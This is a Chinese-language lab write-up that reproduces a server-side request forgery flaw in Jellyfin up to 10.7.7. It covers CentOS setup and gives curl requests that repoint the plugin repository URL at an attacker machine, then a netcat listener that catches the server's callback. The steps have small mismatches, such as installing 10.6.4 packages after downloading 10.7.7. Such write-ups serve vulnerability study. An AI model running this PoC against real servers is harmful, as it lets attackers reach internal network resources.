Jellyfin 直到 v10.7.7 通过组件 /Repository 包含服务器端请求伪造 (SSRF)。此漏洞允许攻击者通过构建的 POST 请求访问网络资源和敏感信息。
实验环境:Centos 7
试验机器IP地址:192.168.50.122:8096
攻击机器IP地址:192.168.50.254:2223
部署方式:
wget -O /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.repo
sed -i -e '/mirrors.cloud.aliyuncs.com/d' -e '/mirrors.aliyuncs.com/d' /etc/yum.repos.d/CentOS-Base.repo
wget -O /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo/epel-7.repo
yum install epel-release
wget https://download1.rpmfusion.org/free/el/rpmfusion-free-release-7.noarch.rpm
rpm -ihv rpmfusion-free-release-7.noarch.rpm
yum install ffmpeg
https://repo.jellyfin.org/archive/server/centos/stable/10.7.7/server/jellyfin-server-10.7.7-1.el7.x86_64.rpm
https://repo.jellyfin.org/archive/server/centos/stable/10.7.7/server/jellyfin-10.7.7-1.el7.x86_64.rpm
https://repo.jellyfin.org/archive/server/centos/stable/10.7.7/web/jellyfin-web-10.7.7-1.el7.noarch.rpm
yum localinstall jellyfin-web-10.6.4-1.el7.noarch.rpm
yum localinstall jellyfin-server-10.6.4-1.el7.x86_64.rpm
yum localinstall jellyfin-10.6.4-1.el7.x86_64.rpm
systemctl enable jellyfin.service
systemctl start jellyfin.service
netstat -anp | grep 8096
访问http://192.168.50.122:8096 测试地址,而后按照流程直接设置好后登录后台
漏洞位于插件模块(Repository )->存储库添加处,此处存在SSRF漏洞
首先,我们使用以下POC来获取系统本身的存储库:
curl -X GET "http://192.168.50.122:8096/Repositories" -H "accept: application/json" -H "x-emby-token: ea314abb3b444d769da3038c2afb8354"
输出如下:
[{"Name":"Jellyfin Stable","Url":"https://repo.jellyfin.org/releases/plugin/manifest-stable.json","Enabled":true}]
我们使用以下POC修改储存库
[{"Name":"Jellyfin Stable","Url":"http://192.168.50.254:2223/ssrf_test?param=1¶m2=3","Enabled":true}]
这时,我们再次获取仓库,输出如下:
[{"Name":"Jellyfin Stable","Url":"http://192.168.50.254:2223/ssrf_test?param=1\u0026param2=3","Enabled":true}]
我们此时发送如下请求,同时在192.168.50.254攻击机上开启2223监听端口
nc -lvvp 2223
curl -X GET "http://192.168.50.122:8096/Packages" -H "accept: application/json" -H "x-emby-token: ea314abb3b444d769da3038c2afb8354"
反回KALI攻击机,发现此时已经成功监听到请求
